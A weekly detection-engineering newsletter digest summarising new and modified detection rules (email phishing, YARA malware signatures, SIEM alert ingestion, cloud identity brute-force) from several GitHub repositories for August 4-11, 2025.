This week's update highlights the most significant changes to detection rules from 6 of the 40+ monitored GitHub repositories. Between Aug 4 and Aug 11, 2025, contributors added 13 new rules and updated 31 existing ones.

Stay informed about the latest changes in detection engineering to improve your threat detection coverage and operational efficiency.

Key Takeaways

• New email detections target modern social engineering and browser-based attacks. Rules identify callback phishing from legitimate services like Zoom, BEC thread hijacking, and FileJacking attacks using the Chromium File System Access API. Existing detections were improved with Optical Character Recognition (OCR) for image-based phishing and MIME type checks for malicious SVG attachments. (sublime-security/sublime-rules, delivr-to/detections)

• New YARA rules were added to detect malware payloads and attack chains. One set of rules identifies a multi-stage Java malware attack, covering its loader, final payload, obfuscator, and scheduled task persistence. A separate rule detects the Stealc infostealer by matching specific byte sequences within PE files. (Neo23x0/signature-base, kevoreilly/CAPEv2)

• New rules focus on ingesting alerts from third-party security products to centralize threat data. Elastic now consumes SentinelOne threat alerts and improved context for CrowdStrike and Microsoft Sentinel alerts. Splunk added a detection to process Cisco AppDynamics alerts for web application attacks like SQLi and SSRF. (elastic/detection-rules, splunk/security_content)

• A large set of Elastic's cloud detection rules for AWS, Entra ID, M365, and Okta was refactored. The changes standardize ESQL query syntax and field naming for rules covering privilege escalation, data exfiltration, and brute-force attacks. This action improves rule maintainability without altering core detection logic. (elastic/detection-rules)

• Tuning efforts for SharePoint brand impersonation rules aim to reduce false positives. The logic was refined to better identify and exclude reply-chain emails from detection. The rules also now include exceptions for organization-specific tenant domains. (sublime-security/sublime-rules)

🚀 Make updates from this digest operational:

All detection rules from this digest are available in our MISP and STIX/TAXII feeds.

Subscribe to integrate directly into your SIEM, TIP, or SOAR solution, boosting your automated threat detection and enriching your existing intel.

Learn more

Table Of Contents

• Corporate repositories (4)

  • sublime-security/sublime-rules (+5, ✎11)

  • elastic/detection-rules (+1, ✎19)

  • splunk/security_content (+1)

  • delivr-to/detections (+2)

• Personal repositories (2)

  • kevoreilly/CAPEv2 (✎1)

  • Neo23x0/signature-base (+4)

• Feedback

• Disclaimer

• Powered by

Corporate repositories (4)

sublime-security/sublime-rules (+5, ✎11)

+ New rules

New rules target email-based social engineering. Detections include BEC thread hijacking to obtain mobile numbers, callback phishing from legitimate Zoom infrastructure, and Disney brand impersonation for credential theft. These rules use NLU, sender analysis, and logo detection to identify the threats. (Business Email Compromise: Request For Mobile Number Via Reply Thread Hijacking, Callback Phishing via Zoom comment, Brand Impersonation: Disney)

New rules identify mass-distributed malicious or unwanted emails. One rule detects predatory academic journal solicitations by combining content analysis with technical indicators like new domains. Another rule flags malicious links on free hosting services sent to undisclosed recipients to find widespread campaigns. (Predatory Academic Journal Solicitation, Link: Free file hosting with undisclosed recipients)

✎ Modified rules

Two rules for detecting Microsoft SharePoint impersonation were refined. Updates improve the logic for identifying and excluding reply-chain emails and add exceptions for organization-specific tenant domains, reducing false positives while maintaining coverage. (Brand impersonation: Sharepoint, Brand impersonation: Sharepoint fake file share)

Detection for malicious SVG file attachments was improved across multiple rules. Changes include identifying SVGs by MIME type, not just file extension, and scanning for code execution, content padding, and their use in voicemail phishing schemes. (Attachment: SVG file execution, Attachment: Web files with suspicious comments, Fake voicemail notification (untrusted sender))

Detection for credential phishing emails was broadened. One rule adds keywords like 'stuck' and 'sign in' for quarantine-themed lures. Another now uses Optical Character Recognition (OCR) to find credential theft intent in images and matches more variations of 'secure message' lures. (Fake email quarantine notification, Credential phishing: 'Secure message' and engaging language)

Several rules were tuned for accuracy and performance. This includes more robust DMARC checks for emails with catbox.moe links, a performance modification for a reconnaissance email detector, and new domain exclusions to reduce false positives in a Microsoft brand impersonation rule. (Catbox.moe Link From Untrusted Source, Reconnaissance: All recipients cc/bcc'd or undisclosed, Brand impersonation: Microsoft)

The rule for detecting sextortion emails was updated with additional keywords. New terms like 'remote access', 'explicit', and threat phrases involving 'forward' and 'coworkers' were added to improve detection of varied extortion message content. (Extortion / sextortion (untrusted sender))

elastic/detection-rules (+1, ✎19)

+ New rules

A new rule integrates SentinelOne endpoint alerts into the Elastic SIEM. It queries logs-sentinel_one.threat-* indices for event.kind: alert to promote SentinelOne findings to Elastic detection alerts. This action centralizes threat data for investigation within the Elastic Security application. (SentinelOne Threat External Alerts)

✎ Modified rules

Multiple AWS detection rules for CloudTrail were refactored to standardize ESQL query syntax and field naming. These rules cover S3 enumeration, EBS snapshot manipulation for exfiltration or recovery inhibition (T1490, T1485), S3 web content modification, and IAM privilege escalation. The changes improve query maintainability without altering core detection logic. (AWS S3 Bucket Enumeration or Brute Force, AWS EC2 EBS Snapshot Shared or Made Public, AWS S3 Static Site JavaScript File Uploaded, AWS S3 Object Encryption Using External KMS Key, AWS EC2 EBS Snapshot Access Removed, AWS IAM AdministratorAccess Policy Attached to User)

A set of rules detecting brute-force, password spraying, and session hijacking attacks against cloud identity providers was updated. These rules target Microsoft Entra ID, Microsoft 365, and Okta. Most changes involve ESQL query refactoring for syntax and naming consistency, improving rule maintainability. (Microsoft Entra ID MFA TOTP Brute Force Attempts, Microsoft Entra ID Sign-In Brute Force Activity, Microsoft Entra ID Session Reuse with Suspicious Graph Access, Microsoft 365 Brute Force via Entra ID Sign-Ins, Multiple Microsoft 365 User Account Lockouts in Short Time Window, Multiple Okta User Authentication Events with Client Address)

Three Linux host-based detections were improved. A rule for network egress from unusual paths was corrected to fix a regex pattern and an IP exclusion. The web shell detection filter was tightened, and the port scanning detection was tuned for performance. These changes increase the accuracy and efficiency for detecting reconnaissance, C2, and web compromise. (High Number of Egress Network Connections from Unusual Executable, Unusual Command Execution from Web Server Parent, Potential Port Scanning Activity from Compromised Host)

Two rules targeting PowerShell obfuscation techniques—runtime string reconstruction from character arrays and string reordering—were refactored. The changes standardize ESQL query syntax and improve performance, making the detections for these evasive script behaviors more robust and maintainable. (Potential PowerShell Obfuscation via Character Array Reconstruction, Potential PowerShell Obfuscation via String Reordering)

Rules that promote alerts from Microsoft Sentinel and CrowdStrike Falcon were updated. The Sentinel rule adds a 'critical' severity mapping. The CrowdStrike rule uses the specific alert name for the title, improving contextual information for alerts ingested from third-party tools. (Microsoft Sentinel External Alerts, CrowdStrike External Alerts)

splunk/security_content (+1)

+ New rules

A new rule ingests Cisco AppDynamics SecureApp alerts to identify web application attacks. It detects SQL injection, API abuse, deserialization, SSRF, and Log4j exploit attempts. The rule adds severity and a risk message to the alerts, giving analysts context on application layer threats. (Splunk AppDynamics Secure Application Alerts)

delivr-to/detections (+2)

+ New rules

Two new rules detect FileJacking attacks delivered via email. One rule inspects HTML or SVG attachments, while the other analyzes linked web content. Both identify JavaScript patterns that use the Chromium File System Access API, a method to read or modify a user's local files. (Attachment: FileJacking Indicators (Unsolicited), Link: FileJacking Indicators (Unsolicited))

Personal repositories (2)

kevoreilly/CAPEv2 (✎1)

✎ Modified rules

A new YARA rule detects the Stealc infostealer payload (StealcV2)

Neo23x0/signature-base (+4)

+ New rules

A set of four new YARA rules provides layered detection for a Java-based malware attack chain. The rules identify a Java loader by its file structure, a specific final payload JAR via combined signature strings, files obfuscated with the Allatori Obfuscator, and persistence established through Windows Scheduled Tasks that execute JAR files. (SUSP_Scheduled_Task_Java_JAR_Aug25, SUSP_JAVA_Loader_Indicators_Aug25, MAL_JAVA_Loader_Final_Jar_Aug25, SUSP_JAVA_Class_Allatori_Obfuscator_Aug25)

Feedback

Your input helps us improve! If you spot any issues, mistakes, or omissions in this digest issue, or have any other suggestions, we'd love to hear from you. Contact us at team@rulecheck.io - we value your feedback and are committed to improving the content we produce.

Disclaimer

The summaries in this brief are generated by LLM model based on the provided system and user prompts. While every effort is made to consolidate accurate and relevant insights, the model may occasionally misinterpret, misrepresent, or hallucinate information. Readers are strongly advised to verify all key points by consulting the original sources linked in the brief for complete context and accuracy.

Powered by

This digest is built with BlackStork.

Looking for a customized version of this newsletter? We'd be happy to help — contact us.